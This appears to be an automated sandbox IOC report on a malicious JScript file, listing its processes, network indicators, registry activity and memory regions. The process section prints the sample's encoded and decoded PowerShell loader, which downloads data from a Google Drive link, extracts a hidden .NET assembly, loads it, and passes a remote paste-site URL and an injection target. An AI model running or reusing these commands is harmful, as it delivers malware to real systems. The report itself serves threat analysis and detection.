IOC Report
Savyi.js

loading gif

Files

File Path
Type
Category
Malicious
Savyi.js
Unicode text, UTF-8 text, with very long lines (566), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b234y12o.qgp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm42lszd.eg0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onnz5dbs.gdu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3mlfayi.l1n.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Savyi.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAoACAAJABFAE4AVgA6AEMATwBNAHMAUABlAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8AaQBOACcAJwApACAAKAAgACgAKAAnADgATwBaAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABOADYASQBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AJwArACcAMQBBACcAKwAnAEkAVgBnAEoASgBKAHYAMQBGACcAKwAnADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAaABCAFkAdwB1AHIAIABOADYASQA7ADgATwBaAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlACcAKwAnAGIAQwBsAGkAZQBuAHQAOwA4AE8AWgBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgADgATwBaAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAA4AE8AWgBpAG0AYQBnACcAKwAnAGUAVQByAGwAKQA7ADgATwBaAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQAnACsAJwBuACcAKwAnAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdAAnACsAJwBTACcAKwAnAHQAcgBpACcAKwAnAG4AJwArACcAZwAoADgATwBaAGkAbQBhAGcAZQBCACcAKwAnAHkAdABlAHMAKQA7ADgATwBaAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAE4ANgBJADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4ATgA2AEkAOwAnACsAJwA4AE8AWgBlAG4AZABGAGwAJwArACcAYQBnACAAPQAgAE4ANgBJADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBOADYASQA7ADgATwAnACsAJwBaAHMAdABhACcAKwAnAHIAdABJAG4AZABlAHgAIAA9ACAAOABPAFoAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAOABPAFoAcwB0AGEAcgB0AEYAbABhAGcAKQA7ADgATwBaAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAnACsAJwA4AE8AWgBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAA4AE8AWgBlAG4AZABGAGwAYQBnACkAOwA4AE8AWgBzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgADgATwBaAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJwArACcAOAAnACsAJwBPAFoAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ADgATwBaAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AJwArACcAIAA4AE8AWgBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAOABPAFoAYgBhAHMAZQA2ADQATAAnACsAJwBlAG4AZwB0AGgAIAA9ACAAJwArACcAOABPAFoAZQBuAGQASQBuAGQAZQB4ACAALQAgADgATwBaAHMAdABhAHIAdABJAG4AZABlAHgAJwArACcAOwA4AE8AWgBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgADgATwBaAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0ACcAKwAnAHIAaQBuAGcAKAA4AE8AWgBzAHQAYQByAHQASQBuAGQAZQB4ACwAIAA4AE8AWgBiAGEAcwBlADYANABMAGUAbgBnAHQAJwArACcAaAApADsAOABPAFoAYgAnACsAJwBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAOABPAFoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAAwAE4AUAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAA4AE8AWgBfACAAfQApAFsALQAxAC4ALgAtACgAOABPAFoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAEwAZQBuAGcAdABoACkAXQA7ADgATwBaAGMAJwArACcAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAA4AE8AWgBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7ADgATwBaAGwAbwBhACcAKwAnAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdAAnACsAJwBpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAOABPAFoAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ADgATwBaAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABOADYASQBWAEEASQBOADYASQApADsAOABPAFoAdgBhAGkATQAnACsAJwBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoADgATwBaAG4AdQBsAGwALAAgAEAAKABOADYASQAwAC8AZQB6AHEAVAA1AC8AZAAvAGUAZQAuACcAKwAnAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgATgA2AEkALAAgAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALAAgAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALAAgAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALAAgAE4ANgBJAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBOADYASQAsACAATgA2AEkAZABlAHMAYQB0AGkAdgBhAGQAbwBOADYASQAnACsAJwAsACAATgAnACsAJwA2AEkAZABlAHMAYQB0AGkAdgBhAGQAbwBOADYASQAsAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkAJwArACcALABOADYASQBkAGUAcwBhAHQAaQB2AGEAZABvAE4ANgBJACwATgA2AEkAZABlAHMAYQB0AGkAdgBhAGQAbwBOADYASQAsAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALABOADYASQBkAGUAcwBhAHQAaQB2AGEAZABvAE4ANgBJACwATgA2AEkAMQBOADYAJwArACcASQAsAE4ANgBJACcAKwAnAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkAKQApADsAJwApACAALQByAGUAcABsAGEAYwBlACAAIAAnADgATwBaACcALABbAEMAaABhAHIAXQAzADYAIAAtAHIAZQBwAGwAYQBjAGUAIAAgACcAMABOAFAAJwAsAFsAQwBoAGEAcgBdADEAMgA0AC0AcgBlAHAAbABhAGMAZQAnAE4ANgBJACcALABbAEMAaABhAHIAXQAzADkAKQAgACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $ENV:COMsPec[4,15,25]-JoiN'') ( (('8OZimageUrl = N6Ihttps://drive.google.com/uc?export=download&id='+'1A'+'IVgJJJv1F'+'6vS4sUOybnH-sDvUhBYwur N6I;8OZwebClient = New-Objec'+'t System.Net.We'+'bClient;8OZimageBytes = 8OZwebClient.DownloadData(8OZimag'+'eUrl);8OZimageText = [System.Text.E'+'n'+'coding]::UTF8.Get'+'S'+'tri'+'n'+'g(8OZimageB'+'ytes);8OZstartFlag = N6I<<BASE64_START>>N6I;'+'8OZendFl'+'ag = N6I<<BASE64_END>>N6I;8O'+'Zsta'+'rtIndex = 8OZimageText.IndexOf(8OZstartFlag);8OZendIndex = '+'8OZimageText.IndexOf(8OZendFlag);8OZstartIndex -ge 0 -and 8OZendIndex -gt '+'8'+'OZstartIndex;8OZstartIndex +='+' 8OZstartFlag.Length;8OZbase64L'+'ength = '+'8OZendIndex - 8OZstartIndex'+';8OZbase64Command = 8OZimageText.Subst'+'ring(8OZstartIndex, 8OZbase64Lengt'+'h);8OZb'+'ase64Reversed = -join (8OZbase64Command.ToCharArray() 0NP ForEach-Object { 8OZ_ })[-1..-(8OZbase64Command.'+'Length)];8OZc'+'ommandBytes = [System.Convert]::FromBase64String(8OZbase64Reversed);8OZloa'+'dedAssembly = [System.Reflect'+'ion.Assembly]::Load(8OZcommandBytes);8OZvaiMethod = [dnlib.IO.Home].GetMethod(N6IVAIN6I);8OZvaiM'+'ethod.Invoke(8OZnull, @(N6I0/ezqT5/d/ee.'+'etsap//:sptthN6I, N6IdesativadoN6I, N6IdesativadoN6I, N6IdesativadoN6I, N6IAddInProcess32N6I, N6IdesativadoN6I'+', N'+'6IdesativadoN6I,N6IdesativadoN6I'+',N6IdesativadoN6I,N6IdesativadoN6I,N6IdesativadoN6I,N6IdesativadoN6I,N6I1N6'+'I,N6I'+'desativadoN6I));') -replace '8OZ',[Char]36 -replace '0NP',[Char]124-replace'N6I',[Char]39) )"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://drive.google.com
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.usercontent.google.com
unknown
https://aka.ms/pscore6
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 6 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.186.174
drive.usercontent.google.com
142.250.185.161

IPs

IP
Domain
Country
Malicious
142.250.186.174
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
229366C1000
heap
page read and write
229366C9000
heap
page read and write
22937ED0000
heap
page read and write
3745EF8000
stack
page read and write
FA9A1FF000
stack
page read and write
22936769000
heap
page read and write
22936151000
heap
page read and write
2293623E000
heap
page read and write
FA9A2FE000
stack
page read and write
7FF848F30000
trusted library allocation
page read and write
2293619C000
heap
page read and write
229366DF000
heap
page read and write
22936708000
heap
page read and write
22936241000
heap
page read and write
2B50162E000
trusted library allocation
page read and write
7FF848EF0000
trusted library allocation
page read and write
2293477F000
heap
page read and write
2293497D000
heap
page read and write
22936768000
heap
page read and write
210EEEC2000
heap
page read and write
210ECC5B000
heap
page read and write
2B5101B6000
trusted library allocation
page read and write
22936761000
heap
page read and write
22936233000
heap
page read and write
22936961000
heap
page read and write
229366F1000
heap
page read and write
E5B72BE000
stack
page read and write
229366BA000
heap
page read and write
229366C3000
heap
page read and write
3745CFC000
stack
page read and write
22936710000
heap
page read and write
229366E4000
heap
page read and write
229361CE000
heap
page read and write
2293619C000
heap
page read and write
229366E7000
heap
page read and write
2293619C000
heap
page read and write
229366D9000
heap
page read and write
7FF848E70000
trusted library allocation
page read and write
2293671C000
heap
page read and write
22936733000
heap
page read and write
3746079000
stack
page read and write
229366DC000
heap
page read and write
21080162000
trusted library allocation
page read and write
229361C4000
heap
page read and write
210EED67000
heap
page execute and read and write
229366A5000
heap
page read and write
E5B6E7E000
stack
page read and write
E5B7E0E000
stack
page read and write
22936220000
heap
page read and write
22936710000
heap
page read and write
2293615C000
heap
page read and write
229366F4000
heap
page read and write
22936160000
heap
page read and write
7FF848FE0000
trusted library allocation
page read and write
229366A8000
heap
page read and write
2B57DAB7000
heap
page execute and read and write
7FF848CD3000
trusted library allocation
page execute and read and write
7FF849050000
trusted library allocation
page read and write
22936760000
heap
page read and write
229361D2000
heap
page read and write
22934740000
heap
page read and write
2109002B000
trusted library allocation
page read and write
22936783000
heap
page read and write
22936708000
heap
page read and write
229366FD000
heap
page read and write
2293623E000
heap
page read and write
2293673D000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
229366C8000
heap
page read and write
2293623E000
heap
page read and write
229361A1000
heap
page read and write
22936237000
heap
page read and write
229366FD000
heap
page read and write
22934975000
heap
page read and write
2B57B9B0000
heap
page read and write
22936733000
heap
page read and write
229347AF000
heap
page read and write
22934768000
heap
page read and write
2B57BA80000
heap
page read and write
22936238000
heap
page read and write
22936173000
heap
page read and write
2293671C000
heap
page read and write
2293623E000
heap
page read and write
229366F5000
heap
page read and write
2293616E000
heap
page read and write
22936705000
heap
page read and write
7FF848CFC000
trusted library allocation
page read and write
2293672D000
heap
page read and write
374598E000
stack
page read and write
229366BA000
heap
page read and write
22936248000
heap
page read and write
229347D1000
heap
page read and write
210ECC33000
heap
page read and write
2293618F000
heap
page read and write
2B57BAA3000
heap
page read and write
7FF848E91000
trusted library allocation
page read and write
7FF848F70000
trusted library allocation
page read and write
2293622E000
heap
page read and write
22936185000
heap
page read and write
229361A1000
heap
page read and write
229366C9000
heap
page read and write
229366C4000
heap
page read and write
2293482B000
heap
page read and write
229366A9000
heap
page read and write
210ECD40000
trusted library allocation
page read and write
2293619C000
heap
page read and write
229366C7000
heap
page read and write
2293619C000
heap
page read and write
229361C0000
heap
page read and write
22936187000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
2293617B000
heap
page read and write
229347A4000
heap
page read and write
229366B2000
heap
page read and write
7FF848E82000
trusted library allocation
page read and write
22934833000
heap
page read and write
22936165000
heap
page read and write
229366B1000
heap
page read and write
3745F7E000
stack
page read and write
229361B1000
heap
page read and write
210ECB80000
heap
page read and write
2293618C000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
2293619C000
heap
page read and write
229366B5000
heap
page read and write
37459CE000
stack
page read and write
2B57BA60000
heap
page read and write
7FF848E8A000
trusted library allocation
page read and write
22936964000
heap
page read and write
22936710000
heap
page read and write
229361D2000
heap
page read and write
22936177000
heap
page read and write
229366F3000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
229366F2000
heap
page read and write
22936772000
heap
page read and write
22936175000
heap
page read and write
22936782000
heap
page read and write
229366C2000
heap
page read and write
229366AC000
heap
page read and write
2B57DAB0000
heap
page execute and read and write
22936765000
heap
page read and write
2B57BA10000
heap
page read and write
22936157000
heap
page read and write
229361CA000
heap
page read and write
22936710000
heap
page read and write
2293619C000
heap
page read and write
229366F5000
heap
page read and write
22936238000
heap
page read and write
229366F5000
heap
page read and write
229366D9000
heap
page read and write
229361C7000
heap
page read and write
229361CC000
heap
page read and write
229366F3000
heap
page read and write
229366DA000
heap
page read and write
2B57DAEF000
heap
page read and write
22936213000
heap
page read and write
22936707000
heap
page read and write
22936724000
heap
page read and write
229361B4000
heap
page read and write
2293623C000
heap
page read and write
7FF848EF0000
trusted library allocation
page read and write
229366DD000
heap
page read and write
22936194000
heap
page read and write
2293619C000
heap
page read and write
22936700000
heap
page read and write
2293671C000
heap
page read and write
7FF848CED000
trusted library allocation
page execute and read and write
2B50022E000
trusted library allocation
page read and write
210EECD4000
heap
page read and write
2293481D000
heap
page read and write
210EEC32000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
2293623E000
heap
page read and write
22936761000
heap
page read and write
22936224000
heap
page read and write
22936238000
heap
page read and write
22934813000
heap
page read and write
210ECC15000
heap
page read and write
7FF848EC0000
trusted library allocation
page execute and read and write
2293672D000
heap
page read and write
2B57DCD6000
heap
page read and write
7FF848F50000
trusted library allocation
page read and write
2B501714000
trusted library allocation
page read and write
21080512000
trusted library allocation
page read and write
2293615D000
heap
page read and write
2B57DD04000
heap
page read and write
22936237000
heap
page read and write
229361AE000
heap
page read and write
7FF848E81000
trusted library allocation
page read and write
2108006E000
trusted library allocation
page read and write
229366B2000
heap
page read and write
22936241000
heap
page read and write
2293670E000
heap
page read and write
7FF848EE0000
trusted library allocation
page read and write
229361D2000
heap
page read and write
22936706000
heap
page read and write
2293618C000
heap
page read and write
22936185000
heap
page read and write
22936231000
heap
page read and write
7FF848FF0000
trusted library allocation
page read and write
2B50172F000
trusted library allocation
page read and write
229361AB000
heap
page read and write
210EECA3000
heap
page read and write
210ECC13000
heap
page read and write
210ECA80000
heap
page read and write
229366D1000
heap
page read and write
229361D2000
heap
page read and write
E5B6CFE000
stack
page read and write
22934809000
heap
page read and write
2293672D000
heap
page read and write
2108065A000
trusted library allocation
page read and write
22936241000
heap
page read and write
229361C4000
heap
page read and write
22936733000
heap
page read and write
2293617D000
heap
page read and write
7FF848FF0000
trusted library allocation
page read and write
2B57BAA5000
heap
page read and write
22936185000
heap
page read and write
2B57DDA5000
heap
page read and write
2B57D832000
heap
page read and write
2B57BAA7000
heap
page read and write
7FF848CDD000
trusted library allocation
page execute and read and write
229366C0000
heap
page read and write
374590F000
stack
page read and write
2293619C000
heap
page read and write
22934610000
heap
page read and write
2293672E000
heap
page read and write
22936768000
heap
page read and write
22936197000
heap
page read and write
21080111000
trusted library allocation
page read and write
229366EE000
heap
page read and write
210EEEB3000
heap
page read and write
210EEECB000
heap
page read and write
2293618C000
heap
page read and write
22936768000
heap
page read and write
22936237000
heap
page read and write
229366BB000
heap
page read and write
229366B2000
heap
page read and write
2B57B9A0000
heap
page read and write
2B500084000
trusted library allocation
page read and write
2293622E000
heap
page read and write
22936706000
heap
page read and write
2293618C000
heap
page read and write
22936688000
heap
page read and write
229366A8000
heap
page read and write
21080503000
trusted library allocation
page read and write
22936706000
heap
page read and write
22936689000
heap
page read and write
2293619C000
heap
page read and write
2108009D000
trusted library allocation
page read and write
E5B7138000
stack
page read and write
2B57DD31000
heap
page read and write
E5B733E000
stack
page read and write
22936179000
heap
page read and write
229366A1000
heap
page read and write
229366F2000
heap
page read and write
210EEBE0000
heap
page read and write
22936747000
heap
page read and write
210EE630000
heap
page execute and read and write
7FF849020000
trusted library allocation
page read and write
229366E2000
heap
page read and write
229366ED000
heap
page read and write
210ECDA0000
heap
page read and write
2293671C000
heap
page read and write
22936170000
heap
page read and write
2B50187C000
trusted library allocation
page read and write
2293667F000
heap
page read and write
7FF848D96000
trusted library allocation
page read and write
2B57BDD0000
trusted library allocation
page read and write
21080435000
trusted library allocation
page read and write
E5B73BE000
stack
page read and write
2293482E000
heap
page read and write
2293617D000
heap
page read and write
E5B69E3000
stack
page read and write
229366EF000
heap
page read and write
22934818000
heap
page read and write
22934819000
heap
page read and write
2B57D7F0000
trusted library allocation
page read and write
229361A3000
heap
page read and write
210ECBDB000
heap
page read and write
22936688000
heap
page read and write
22934970000
heap
page read and write
7FF848CE2000
trusted library allocation
page read and write
229366C9000
heap
page read and write
22936248000
heap
page read and write
2B5018E1000
trusted library allocation
page read and write
210ECDA5000
heap
page read and write
2293622B000
heap
page read and write
2293617A000
heap
page read and write
22936738000
heap
page read and write
7FF848F30000
trusted library allocation
page read and write
22936709000
heap
page read and write
22936710000
heap
page read and write
229361CC000
heap
page read and write
229361C7000
heap
page read and write
22936157000
heap
page read and write
2293673D000
heap
page read and write
37460FF000
stack
page read and write
229361D1000
heap
page read and write
229366A8000
heap
page read and write
E5B6DFD000
stack
page read and write
37461FE000
stack
page read and write
229366AB000
heap
page read and write
7FF848EB2000
trusted library allocation
page read and write
229366E6000
heap
page read and write
2293619C000
heap
page read and write
21080128000
trusted library allocation
page read and write
E5B743B000
stack
page read and write
229366E0000
heap
page read and write
2293497C000
heap
page read and write
22936237000
heap
page read and write
2293617A000
heap
page read and write
229366FD000
heap
page read and write
3745D7E000
stack
page read and write
22936725000
heap
page read and write
22936164000
heap
page read and write
2293670E000
heap
page read and write
229366FC000
heap
page read and write
3745DFE000
stack
page read and write
229361A7000
heap
page read and write
229366DD000
heap
page read and write
22936215000
heap
page read and write
229361D1000
heap
page read and write
229366A6000
heap
page read and write
22936238000
heap
page read and write
7FF849000000
trusted library allocation
page read and write
22936231000
heap
page read and write
7FF848F90000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page read and write
2293670B000
heap
page read and write
21090010000
trusted library allocation
page read and write
22936238000
heap
page read and write
210EEBEA000
heap
page read and write
2293622A000
heap
page read and write
7FF848FC0000
trusted library allocation
page read and write
229366C9000
heap
page read and write
21080581000
trusted library allocation
page read and write
22936761000
heap
page read and write
2B57D476000
heap
page read and write
2B57BA50000
trusted library allocation
page read and write
2B57BE00000
heap
page read and write
22936178000
heap
page read and write
22936241000
heap
page read and write
2293677D000
heap
page read and write
210803ED000
trusted library allocation
page read and write
2B57BE04000
heap
page read and write
229366BC000
heap
page read and write
229366FF000
heap
page read and write
22934813000
heap
page read and write
2293667C000
heap
page read and write
374627E000
stack
page read and write
2B5102ED000
trusted library allocation
page read and write
22934829000
heap
page read and write
2293672D000
heap
page read and write
22934769000
heap
page read and write
229366B7000
heap
page read and write
210ECCD0000
heap
page read and write
229366C2000
heap
page read and write
2293623E000
heap
page read and write
7FF848DA0000
trusted library allocation
page execute and read and write
229366C8000
heap
page read and write
22934781000
heap
page read and write
7FF848EC2000
trusted library allocation
page read and write
21080023000
trusted library allocation
page read and write
229366B3000
heap
page read and write
22936709000
heap
page read and write
7FF848F10000
trusted library allocation
page read and write
22934821000
heap
page read and write
22938010000
trusted library allocation
page read and write
22936706000
heap
page read and write
229366A8000
heap
page read and write
229346F0000
heap
page read and write
210ECC1B000
heap
page read and write
2293670A000
heap
page read and write
21080125000
trusted library allocation
page read and write
2293618C000
heap
page read and write
22936237000
heap
page read and write
7FF848CE4000
trusted library allocation
page read and write
2293669F000
heap
page read and write
22934813000
heap
page read and write
229366FD000
heap
page read and write
22936238000
heap
page read and write
7FF848F90000
trusted library allocation
page read and write
229366C7000
heap
page read and write
2B57D940000
heap
page execute and read and write
22934834000
heap
page read and write
229366DB000
heap
page read and write
210EEE78000
heap
page read and write
229366A8000
heap
page read and write
FA9A5FB000
stack
page read and write
210800A7000
trusted library allocation
page read and write
229366F2000
heap
page read and write
229366EF000
heap
page read and write
2293619D000
heap
page read and write
2293481C000
heap
page read and write
7DF4FB160000
trusted library allocation
page execute and read and write
2B501AE3000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
2B57BB53000
heap
page read and write
2293618C000
heap
page read and write
2293622E000
heap
page read and write
7FF849000000
trusted library allocation
page read and write
7FF848F00000
trusted library allocation
page read and write
2B57BAE5000
heap
page read and write
210EF100000
heap
page read and write
210ECC60000
heap
page read and write
3745FFC000
stack
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
229361D2000
heap
page read and write
2293477F000
heap
page read and write
210ECC21000
heap
page read and write
2B57DBC0000
heap
page read and write
229366FD000
heap
page read and write
2293476E000
heap
page read and write
22936772000
heap
page read and write
7FF848D2C000
trusted library allocation
page execute and read and write
7FF848FB0000
trusted library allocation
page read and write
210ECD00000
trusted library allocation
page read and write
2293676A000
heap
page read and write
210EEE80000
heap
page read and write
2293623E000
heap
page read and write
210803FF000
trusted library allocation
page read and write
7FF848D9C000
trusted library allocation
page execute and read and write
229361B7000
heap
page read and write
2293619C000
heap
page read and write
2B500C2E000
trusted library allocation
page read and write
229366DA000
heap
page read and write
2293671C000
heap
page read and write
2B57BA73000
heap
page read and write
229361C7000
heap
page read and write
2B57D7F3000
trusted library allocation
page read and write
229366C7000
heap
page read and write
229366E7000
heap
page read and write
22936233000
heap
page read and write
229366C9000
heap
page read and write
229361A8000
heap
page read and write
2B57DB22000
heap
page read and write
2B57DA70000
heap
page execute and read and write
2293622E000
heap
page read and write
229366BF000
heap
page read and write
229361C7000
heap
page read and write
22936226000
heap
page read and write
2293618F000
heap
page read and write
2293672E000
heap
page read and write
22936194000
heap
page read and write
2293477F000
heap
page read and write
229361C5000
heap
page read and write
2B57DD9D000
heap
page read and write
229366D9000
heap
page read and write
229366A8000
heap
page read and write
22936231000
heap
page read and write
229361CA000
heap
page read and write
22936177000
heap
page read and write
2B57BAAD000
heap
page read and write
2293622B000
heap
page read and write
22936224000
heap
page read and write
7FF848D8C000
trusted library allocation
page execute and read and write
2B57BABF000
heap
page read and write
7FF848DF0000
trusted library allocation
page execute and read and write
229366C3000
heap
page read and write
2293622E000
heap
page read and write
21080050000
trusted library allocation
page read and write
22936231000
heap
page read and write
7FF848F70000
trusted library allocation
page read and write
229366E6000
heap
page read and write
22936164000
heap
page read and write
2293481C000
heap
page read and write
2B57B9D0000
heap
page read and write
37462FB000
stack
page read and write
22934809000
heap
page read and write
7FF848E00000
trusted library allocation
page execute and read and write
210ECBD0000
heap
page read and write
2293677D000
heap
page read and write
229366B2000
heap
page read and write
2B57DAC3000
heap
page read and write
229366EA000
heap
page read and write
229366D9000
heap
page read and write
7FF848DB6000
trusted library allocation
page execute and read and write
22936701000
heap
page read and write
229366C4000
heap
page read and write
2B501718000
trusted library allocation
page read and write
229361C7000
heap
page read and write
2293672D000
heap
page read and write
22936156000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
229361D3000
heap
page read and write
E5B7E8C000
stack
page read and write
22936231000
heap
page read and write
2293622B000
heap
page read and write
229366E0000
heap
page read and write
2293670B000
heap
page read and write
2293615A000
heap
page read and write
229361C0000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
2293623E000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
2293617A000
heap
page read and write
22934809000
heap
page read and write
22936761000
heap
page read and write
22936768000
heap
page read and write
E5B6FF9000
stack
page read and write
229361C4000
heap
page read and write
2293619C000
heap
page read and write
22936709000
heap
page read and write
22936231000
heap
page read and write
229366D9000
heap
page read and write
229366BD000
heap
page read and write
2293670B000
heap
page read and write
2293482C000
heap
page read and write
2293617F000
heap
page read and write
2293619C000
heap
page read and write
229366EF000
heap
page read and write
2B57BAE7000
heap
page read and write
2293619C000
heap
page read and write
229366AF000
heap
page read and write
7FF848F50000
trusted library allocation
page read and write
22936789000
heap
page read and write
2293482A000
heap
page read and write
210EEE70000
heap
page read and write
2293615A000
heap
page read and write
22936782000
heap
page read and write
22936768000
heap
page read and write
229361D0000
heap
page read and write
22936705000
heap
page read and write
7FF848D80000
trusted library allocation
page read and write
22934710000
heap
page read and write
22936231000
heap
page read and write
210ECD30000
heap
page readonly
E5B6EFE000
stack
page read and write
210EE5D0000
heap
page read and write
2B57DB1D000
heap
page read and write
7FF848EA0000
trusted library allocation
page execute and read and write
2293671F000
heap
page read and write
229366F5000
heap
